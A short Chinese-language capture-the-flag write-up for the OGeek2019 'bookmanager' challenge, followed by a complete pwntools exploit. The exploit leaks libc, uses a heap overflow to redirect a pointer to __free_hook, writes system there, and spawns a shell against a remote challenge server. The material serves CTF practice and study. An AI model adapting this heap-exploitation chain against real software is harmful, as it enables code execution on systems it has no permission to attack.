[OGeek2019]bookmanager
做过的代码量最大的一个题
说它好也好,说它不好也不好,利用点很简单,就是一个大规模的heap overflow,就是逆起来有点儿难度
思路很简单,就是利用堆溢出覆盖结构体中的指针为__free_hook,然后改freehook
给👴整吐了,做了俩小时,然后本地到了最后一步,freehook每次内容都是一个奇怪的值,就是改不了system,然后远程一打就通了-.-||
# Exploit script for the CTF challenge "[OGeek2019] bookmanager".
# Written for Python 2 (uses the `print` statement) with pwntools.
# Layout: connection setup, one helper per menu option of the target
# binary, then the two-step exploit described in the writeup above
# (leak libc, then use the heap overflow to redirect a heap pointer
# at __free_hook and overwrite the hook).
from pwn import *

# 1 = run the binary locally, anything else = connect to the remote instance.
local = 0

binary = "./pwn"

if local == 1:
    p = process(binary)
else:
    p = remote("node3.buuoj.cn",27329)

def dbg():
    # Switch pwntools to verbose I/O logging (only called while debugging;
    # the call below is commented out).
    context.log_level = 'debug'

# Terminal used by gdb.attach() when debugging in tmux.
context.terminal = ['tmux','splitw','-h']

# --- menu wrappers: each one drives one option of the target's text menu ---

def create_book(name):
    # Initial prompt of the program, before the menu is shown.
    p.sendafter('Name of the book you want to create:',name)

def add_chapter(name):
    # Menu option 1.
    p.sendlineafter('Your choice:','1')
    p.sendafter('Chapter name:',name)

def add_section(chapter_name,name):
    # Menu option 2: add a section under the chapter named `chapter_name`.
    p.sendlineafter('Your choice:','2')
    p.sendafter('Which chapter do you want to add into:',chapter_name)
    p.sendafter('Section name:',name)

def add_text(section_name,size,name):
    # Menu option 3: attach a text of `size` bytes to the section.
    # NOTE(review): the size is sent with sendafter (no trailing newline);
    # presumably the binary reads a fixed number of bytes here - confirm.
    p.sendlineafter('Your choice:','3')
    p.sendafter('Which section do you want to add into:',section_name)
    p.sendafter('How many chapters you want to write:',str(size))
    p.sendafter('Text:',name)

def remove_chapter(chapter_name):
    # Menu option 4 (unused by the exploit below).
    p.sendlineafter('Your choice:','4')
    p.sendafter('Chapter name:',chapter_name)

def remove_section(section_name):
    # Menu option 5 (unused by the exploit below).
    p.sendlineafter('Your choice:','5')
    p.sendafter('Section name:',section_name)

def remove_text(section_name):
    # Menu option 6: free the text attached to the section.
    p.sendlineafter('Your choice:','6')
    p.sendafter('Section name:',section_name)

def show():
    # Menu option 7: print the book; used to read back leaked data.
    p.sendlineafter('Your choice:','7')

def edit_text(sectionname,newname):
    # Menu option 8, sub-choice "Text": rewrite the text of a section.
    p.sendlineafter('Your choice:','8')
    p.sendlineafter('What to update?(Chapter/Section/Text):','Text')
    p.sendafter('Section name:',sectionname)
    p.sendafter('New Text:',newname)

def edit_section(old_sectionname,newname):
    # Menu option 8, sub-choice "Section" (unused by the exploit below).
    p.sendlineafter('Your choice:','8')
    p.sendlineafter('What to update?(Chapter/Section/Text):','Section')
    p.sendafter('Section name:',old_sectionname)
    p.sendafter('New Section name:',newname)

# Symbol offsets are taken from the libc shipped with the challenge;
# the constants further down are specific to this libc version.
libc = ELF('./libc-2.23.so')

create_book('lemon')

print "==== step1: leak libc ===="
add_chapter('one')
add_section('one','c' * 8)
add_text('c' * 8,0x80,'d' * 8)

add_chapter('\x01')

# Free and re-allocate the 0x80-byte text, then show() prints whatever the
# allocator left in the reused chunk; a libc pointer is expected there.
remove_text('cccccccc')
add_text('cccccccc',0x80,'aaaaaaaa')
show()
# Take the 6 low bytes of the first value ending in 0x7f as a libc address.
# NOTE(review): "- 88 - 0x10" converts that pointer to __malloc_hook's
# address on libc-2.23; confirm against the libc if the build changes.
__malloc_hook = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 88 - 0x10
libc_base = __malloc_hook - libc.sym['__malloc_hook']
__free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
print "libc base: ",hex(libc_base)

print "==== step2: heapoverflow make heap pointer to free hook ===="
add_text('cccccccc',0x10,'\x01')
# Overflow payload written through edit_text into the 0x10-byte text:
# starts with the "/bin/sh" string that will be freed later, and ends with
# p64(__free_hook), which (per the writeup) lands on a pointer field of the
# neighbouring "dddddddd" section so that its text pointer becomes
# __free_hook. NOTE(review): the p64(0x41) presumably preserves a chunk
# size header in between - verify with the debugger.
payload = '/bin/sh\x00' + 'a' * 8 + p64(0) + p64(0x41) + 'dddddddd' + p64(0) * 3 + p64(__free_hook)
add_section('one','dddddddd')
#dbg()
edit_text('cccccccc',payload)
# Editing "dddddddd" now writes through the hijacked pointer, i.e. into
# __free_hook.
edit_text('dddddddd',p64(system))
# Freeing the text that begins with "/bin/sh" triggers the hook.
remove_text('cccccccc')

#gdb.attach(p)
p.interactive()